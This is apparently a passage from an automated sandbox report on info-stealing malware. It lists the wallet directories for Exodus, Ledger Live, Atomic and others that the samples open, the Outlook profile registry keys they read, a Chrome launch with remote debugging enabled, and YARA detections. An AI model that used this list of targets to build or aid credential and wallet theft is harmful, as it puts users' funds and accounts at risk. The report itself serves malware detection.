Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Documents\BFCGDAAKFH.exe Directory queried: C:\Users\user\Documents
Source: Yara match File source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1646112524.00000000010EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1646073174.00000000010E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1644858427.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1644788411.0000000001098000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ElmEHL9kP9.exe PID: 6272, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe PID: 1016, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: Yara match File source: Process Memory Space: ElmEHL9kP9.exe PID: 6272, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 6.2.KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2484458829.000000000132E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2481882187.0000000000C21000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe PID: 1016, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe PID: 1016, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CC50C40 sqlite3_bind_zeroblob, 6_2_6CC50C40
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CC50D60 sqlite3_bind_parameter_name, 6_2_6CC50D60
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB78EA0 sqlite3_clear_bindings, 6_2_6CB78EA0
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CC50B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 6_2_6CC50B40
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB76410 bind,WSAGetLastError, 6_2_6CB76410
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB760B0 listen,WSAGetLastError, 6_2_6CB760B0
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB7C030 sqlite3_bind_parameter_count, 6_2_6CB7C030
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB76070 PR_Listen, 6_2_6CB76070
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB7C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 6_2_6CB7C050
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB022D0 sqlite3_bind_blob, 6_2_6CB022D0
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB763C0 PR_Bind, 6_2_6CB763C0
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB79480 sqlite3_bind_null, 6_2_6CB79480
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB794F0 sqlite3_bind_text16, 6_2_6CB794F0
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB794C0 sqlite3_bind_text, 6_2_6CB794C0
Source: C:\Users\user\AppData\Local\Temp\KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe Code function: 6_2_6CB79400 sqlite3_bind_int64, 6_2_6CB79400
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs